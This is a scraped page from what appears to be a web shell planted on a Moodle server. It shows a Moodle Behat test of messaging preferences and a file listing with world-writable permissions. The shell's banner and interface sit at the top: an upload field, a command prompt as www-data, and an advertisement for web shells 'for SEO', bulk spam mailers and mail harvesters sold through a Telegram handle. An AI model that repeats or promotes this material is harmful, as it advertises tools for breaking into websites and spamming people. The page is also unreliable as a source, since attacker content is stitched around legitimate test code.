__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

www-data@216.73.216.10: ~ $
@core @core_message @javascript
Feature: Manage preferences
  In order to control whether I'm contactable
  As a user
  I need to be able to update my messaging preferences

  Background:
    # Note: This course is using separate groups mode.
    Given the following "courses" exist:
      | fullname | shortname | category | groupmode |
      | Course 1 | C1        | 0        | 1         |
    And the following "users" exist:
      | username | firstname | lastname | email                |
      | student1 | Student   | 1        | student1@example.com |
      | student2 | Student   | 2        | student2@example.com |
      | student3 | Student   | 3        | student3@example.com |
      | student4 | Student   | 4        | student4@example.com |
      | student5 | Student   | 5        | student5@example.com |
    And the following "course enrolments" exist:
      | user     | course | role |
      | student1 | C1     | student |
      | student2 | C1     | student |
      | student3 | C1     | student |
      | student4 | C1     | student |
    And the following "groups" exist:
      | name    | course | idnumber | enablemessaging |
      | Group 1 | C1     | G1       | 1               |
    And the following "group members" exist:
      | user | group |
      | student1 | G1 |
      | student4 | G1 |
    And the following "message contacts" exist:
      | user     | contact |
      | student1 | student2 |
    And the following config values are set as admin:
      | messaging         | 1 |
      | messagingallusers | 1 |
      | messagingminpoll  | 1 |

  # Recipient has 'My contacts only' set.
  Scenario: Allow sending a message when you are a contact
    Given I log in as "student1"
    And I open messaging
    And I open messaging settings preferences
    When I click on "//label[text()[contains(.,'My contacts only')]]" "xpath_element"
    And I log out
    Then I log in as "student2"
    And I open messaging
    And I send "Hi!" message to "Student 1" user
    And I should see "Hi!" in the "//*[@data-region='message-drawer']//div[@data-region='content-message-container']" "xpath_element"

  # Recipient has 'My contacts and anyone in my courses' set.
  Scenario: Disallow sending a message if you are neither contacts with the recipient nor do you share a course
    Given I log in as "student1"
    And I open messaging
    And I open messaging settings preferences
    When I click on "//label[text()[contains(.,'My contacts and anyone in my courses')]]" "xpath_element"
    And I log out
    Then I log in as "student5"
    And I open messaging
    And I search for "Student 1" in messaging
    And I should see "No results"

  # Recipient has 'My contacts and anyone in my courses' set.
  Scenario: Allow sending a message if you share a group in a shared course
    Given I log in as "student1"
    And I open messaging
    And I open messaging settings preferences
    When I click on "//label[text()[contains(.,'My contacts and anyone in my courses')]]" "xpath_element"
    And I log out
    Then I log in as "student4"
    And I open messaging
    And I send "Hi!" message to "Student 1" user
    And I should see "Hi!" in the "//*[@data-region='message-drawer']//div[@data-region='content-message-container']" "xpath_element"

  # Recipient has 'My contacts and anyone in my courses' set.
  Scenario: Disallow sending a message if you are neither a contact, nor are in the same group in a shared course
    Given I log in as "student1"
    And I open messaging
    And I open messaging settings preferences
    When I click on "//label[text()[contains(.,'My contacts and anyone in my courses')]]" "xpath_element"
    And I log out
    Then I log in as "student3"
    And I open messaging
    And I search for "Student 1" in messaging
    And I should see "No results"

  # Recipient has 'Anyone on the site' set. Only users whose profiles are visible can be found via the search.
  Scenario: Disallow sending a message if you are neither a contact nor do you share a course with the user.
    Given I log in as "student1"
    And I open messaging
    And I open messaging settings preferences
    When I click on "//label[text()[contains(.,'Anyone on the site')]]" "xpath_element"
    And I log out
    Then I log in as "student5"
    And I open messaging
    And I search for "Student 1" in messaging
    And I should see "No results"

  Scenario: Sending a message when 'User enter to send' is enabled
    Given I log in as "student1"
    And I open messaging
    And I select "Student 2" user in messaging
    And I set the field with xpath "//textarea[@data-region='send-message-txt']" to "Hi!"
    And I press the enter key
    Then I should see "Hi!" in the "//*[@data-region='message-drawer']//div[@data-region='content-message-container']" "xpath_element"

  Scenario: Sending a message after 'Use enter to send' is disabled
    Given I log in as "student1"
    And I open messaging
    And I open messaging settings preferences
    When I click on "//label[text()[contains(.,'Use enter to send')]]" "xpath_element"
    And I go back in "view-settings" message drawer
    Then I select "Student 2" user in messaging
    And I set the field with xpath "//textarea[@data-region='send-message-txt']" to "Hi!"
    And I press the enter key
    And I should not see "Hi!" in the "//*[@data-region='message-drawer']//div[@data-region='content-message-container']" "xpath_element"
    And I press "Send message"
    And I should see "Hi!" in the "//*[@data-region='message-drawer']//div[@data-region='content-message-container']" "xpath_element"

Filemanager

Name Type Size Permission Actions
behat_message.php File 12.1 KB 0777
block_user.feature File 2.87 KB 0777
capability_message_any_user.feature File 1.92 KB 0777
delete_messages.feature File 13.52 KB 0777
favourite_conversations.feature File 4.53 KB 0777
group_conversation.feature File 5.77 KB 0777
message_admin_settings.feature File 1.57 KB 0777
message_delete_conversation.feature File 6.42 KB 0777
message_drawer_manage_contacts.feature File 4.86 KB 0777
message_manage_notification_preferences.feature File 12.19 KB 0777
message_manage_preferences.feature File 5.46 KB 0777
message_preferences.feature File 4.06 KB 0777
message_send_messages.feature File 4.01 KB 0777
mute_conversations.feature File 4.67 KB 0777
self_conversation.feature File 3.05 KB 0777
unread_messages.feature File 4.55 KB 0777
Filemanager